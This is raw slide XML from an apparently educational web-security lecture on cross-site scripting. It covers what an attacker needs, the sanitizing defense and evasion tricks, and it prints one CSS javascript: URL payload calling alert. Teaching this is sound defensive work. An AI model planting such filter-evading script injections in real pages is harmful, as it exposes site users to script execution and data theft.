                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC8D5AF-6117-C144-A7FE-0830DE5B41D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4894263"/>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8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD923F6-0196-3049-B991-76CB7DF37850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4832350"/>
            <a:ext cx="8188325" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specially-crafted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>URL.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12FFF65-816F-DB42-AADA-59E20BC16388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5387975"/>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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAC3E95-64B8-8541-AC8B-66307EAB9C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="5327650"/>
            <a:ext cx="7583488" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Optional: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>receiving </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stolen user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0436D334-8C25-6E45-9DD8-265B0B715998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="6115050"/>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73068" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E806A04-EB84-C444-B15B-B99EFF446FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6091238"/>
            <a:ext cx="7300913"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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Server does not ensure its output does not  contain foreign, embedded scripts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D684ACC-8F34-4E47-98C3-7806551542C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="1738313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="44370" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28526" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" spc="-310" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-5" dirty="0"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="254" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-5" dirty="0"/>
              <a:t>Filter/Escape</a:t>
            </a:r>
            <a:endParaRPr sz="5500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC09DF86-2E94-8441-90B6-8BD8A985EFAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585788" y="370205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74084" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78FFC9C-252F-FF46-9F47-3AB907627C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="927100" y="3651250"/>
            <a:ext cx="78105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700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical defense is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sanitizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: remove executable  portions of user-provided content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545D08B1-2650-7E42-B8FF-14FB5D099557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930275" y="4689475"/>
            <a:ext cx="128588" cy="244475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="250" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC664DB0-B5E6-8644-9B7F-F144B6336399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930275" y="5172075"/>
            <a:ext cx="128588" cy="244475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="250" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2283D288-677B-5044-A586-ADADDC657302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4641850"/>
            <a:ext cx="8118475" cy="1949450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="-675" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="-675" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="-675" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/javascript&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2100" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validates all headers, cookies, query strings, form fields, and hidden fields  (i.e., all parameters) against a rigorous specification of what should be  allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exist for this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" b="1" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>purpose</a:t>
            </a:r>
            <a:endParaRPr sz="2100" b="1" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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D028343-5DCE-C64B-98E3-0DBEFC468766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="41203" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="120" dirty="0"/>
              <a:t>Did </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="10" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="90" dirty="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-170" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="20" dirty="0"/>
              <a:t>everything?</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{515802A0-D18C-2445-B488-EBC6FA6431E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="243046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75108" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{648FF711-6896-3349-8D6B-9BFB82955D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="2381250"/>
            <a:ext cx="8083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700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bad guys are inventive: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of ways to introduce  Javascript; e.g., CSS tags and XML-encoded data:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F564015-91BD-7A46-935D-7E33FF21B885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3756025"/>
            <a:ext cx="100012" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" spc="175" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175110" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B19EC1-B686-C74C-B396-83C49D936EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3581400"/>
            <a:ext cx="54483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61000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style="background-image:  url(javascript:alert(’JavaScript’))"&gt;...&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15048077-2236-DA4D-A62A-5FE5469D9CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4559300"/>
            <a:ext cx="114300" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
